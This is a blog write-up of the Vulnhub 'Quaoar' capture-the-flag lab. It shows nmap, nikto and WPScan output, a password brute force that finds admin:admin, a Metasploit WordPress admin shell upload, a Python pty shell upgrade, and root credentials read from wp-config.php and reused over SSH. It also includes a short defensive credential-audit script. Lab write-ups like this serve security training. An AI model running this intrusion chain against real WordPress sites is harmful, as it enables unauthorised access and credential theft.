Vulnhub: Quoaor – CTF

Hello Cyberman!

This article is about a CTF (Capture The Flag). The vulnerable machine is named “Quaoar”.

This CTF is level 1. The machine runs Ubuntu as its OS.

If you want to download it, click the link.

To be honest, I hated this machine. It has very easy solutions, but I went for the hard ones.

If you are ready, let's start.

First, I scanned with Nmap, as I do every time, to find the IP address of the machine.

I used the command below in the terminal (the network range must be written as a full address with a prefix length):

$ nmap 192.168.0.0/16

Then I found the machine's IP address: 192.168.1.20. Next, I ran the command below in the terminal to learn which services this machine is running:

$ nmap 192.168.1.20 -Pn -sV -A

And I got the result below:

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.20 -Pn -sV -A     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 14:14 EDT
Nmap scan report for Quaoar.home (192.168.1.20)
Host is up (0.00063s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3?
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL STLS CAPA TOP SASL PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE more post-login STARTTLS SASL-IR capabilities LOGIN-REFERRALS Pre-login OK ID LOGINDISABLEDA0001 listed IMAP4rev1 have LITERAL+
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE post-login more ID SASL-IR LOGIN-REFERRALS capabilities Pre-login AUTH=PLAINA0001 OK listed IMAP4rev1 have LITERAL+
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) CAPA TOP USER PIPELINING
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 39m58s, deviation: 1h37m59s, median: -2s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name: 
|   Domain name: home
|   FQDN: Quaoar.home
|_  System time: 2022-11-02T14:17:27-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.27 seconds
zsh: segmentation fault  nmap 192.168.1.20 -Pn -sV -A

Now I knew there was a website. I typed the IP address into the Firefox URL bar and looked at the site.

Then I clicked the article “Click here to know what you need to do”.

This showed me a picture, like the one below:

Okay, I got an idea. I thought, “This is a picture, and maybe it holds the info!” So I wanted to see if there was a hidden file inside the picture. But there wasn't. If you are curious how to check, I show it below.

First, you need to know about steganography. Click the link to learn about it. Once you have the idea, there is a tool for steganography called Steghide; click the link for details. I tested the picture with steghide and found something: yes, there is a file, but it is protected with a password. If you know the password, enter it and extract the file. If you don't know the password, you can't get the file.

I downloaded the picture and entered the command below in the terminal:

$ steghide info Hack_The_Planet.jpg

The result is shown below:

Then I searched Google for “How to crack steghide?” and learned about a tool named “Stegcracker”. This tool takes a wordlist and tries every password in it.

For example, I tried this:

I tried for a long time, but no luck. I couldn't crack it, even with the rockyou.txt wordlist. 🙁 So I started again and scanned the website with Nikto.

┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.1.20 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.20
+ Target Hostname:    192.168.1.20
+ Target Port:        80
+ Start Time:         2022-11-02 14:28:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-11-02 14:28:42 (GMT-4) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto gave the result above, and I saw a word like gold: WORDPRESS… Then I went to the URL “http://192.168.1.20/wordpress/”.

Finally, I found a website. I scanned it with dirb (dirb is a web content scanner; it looks for subdirectories), but I didn't find enough results. So I scanned this WordPress site with the WPScan tool.

I got the result below:

┌──(kali㉿kali)-[~/Desktop/Quoaor]
└─$ wpscan --url http://192.168.1.20/wordpress/                                          
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.1.20/wordpress/ [192.168.1.20]
[+] Started: Thu Nov 10 15:42:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.20/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.1.20/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.20/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.20/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.39 identified (Outdated, released on 0001-01-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.20/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=3.9.39</generator>
 |  - http://192.168.1.20/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=3.9.39</generator>

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Nov 10 15:42:30 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.925 KB
[+] Data Received: 12.298 MB
[+] Memory used: 243.664 MB
[+] Elapsed time: 00:00:03

Okay, now I knew there is a user named admin. The next step was to crack this user's password. For that I needed a wordlist, and I chose a ready-made one named john.lst.

I entered this command in the terminal:

$ wpscan --url http://192.168.1.20/wordpress/ --passwords /usr/share/wordlists/john.lst

Perfect result! I found the admin user and his password. Username: admin, password: admin.
Is it a joke? Anyways.

I logged into the WordPress admin panel as the admin user and explored the panel. Then I ran msfconsole in the terminal.

I love this framework. I searched for an exploit in msfconsole with the command below:

msf6 > grep shell search wordpress

I found two results:

  • 20 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
  • 70 exploit/unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload

I used exploit number 20, named exploit/unix/webapp/wp_admin_shell_upload.

The result is like the picture above. It needs a few parameters, for example username, password, RHOSTS, etc.

I filled in the required fields.

And I ran it with the “run” command.

And now I'm inside. I dropped to a terminal with the “shell” command. Then, to get an interactive terminal, I ran this command (the path must be absolute): python -c 'import pty;pty.spawn("/bin/bash")'

Now I looked around the machine's terminal as the www-data user. I went to the path “/var/www/” for the wp-config.php file, then read it with the “cat” command, as seen in the picture below:

Most important info! There is root user info in it, and I used it. The info is below:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

User: root

Password: rootpassword!
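As an added defender-side check (not part of this walkthrough or of WordPress itself), the script below parses a wp-config.php like the one above and flags exactly what let this box fall: a root database account, a password that contains the username, and a password reused for another login on the host. The sample config and the “other secrets” map are constructed for the example.

```python
import re

# Constructed sample, modelled on the wp-config.php fragment shown above.
SAMPLE_WP_CONFIG = """<?php
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
define( "DB_HOST", "localhost" );
define('DB_NAME', 'wordpress');
"""

# Matches define('NAME', 'value') with single or double quotes and optional spaces.
DEFINE_RE = re.compile(r"""define\(\s*(['"])(\w+)\1\s*,\s*(['"])(.*?)\3\s*\)""")
PRIVILEGED_DB_USERS = {"root", "admin", "mysql"}


def parse_defines(text):
    """Return {NAME: value} for every define() constant in a wp-config.php."""
    return {m.group(2): m.group(4) for m in DEFINE_RE.finditer(text)}


def audit_db_credentials(text, other_secrets=None):
    """Return a list of findings about the database settings in a wp-config.php.

    other_secrets is an optional {label: password} map of credentials used
    elsewhere on the host (constructed here), used to detect password reuse.
    """
    cfg = parse_defines(text)
    user = cfg.get("DB_USER", "")
    password = cfg.get("DB_PASSWORD", "")
    findings = []
    if user.lower() in PRIVILEGED_DB_USERS:
        findings.append(f"privileged DB account '{user}': use a dedicated WordPress user")
    if len(password) < 16:
        findings.append("DB password shorter than 16 characters")
    if user and user.lower() in password.lower():
        findings.append("DB password contains the username")
    for label, secret in (other_secrets or {}).items():
        if secret == password:
            findings.append(f"DB password reused for {label}")
    return findings


if __name__ == "__main__":
    for finding in audit_db_credentials(SAMPLE_WP_CONFIG, {"ssh root login": "rootpassword!"}):
        print("[!]", finding)
```

Run it against a real wp-config.php by reading the file into `audit_db_credentials`; the reuse check only works if you supply the other credentials to compare against.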

I used this info to log into the machine as root over SSH.

And… finally! I captured the flag.

Have a nice day with lots of informatics. 🙂

3 Comments

  1. Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!
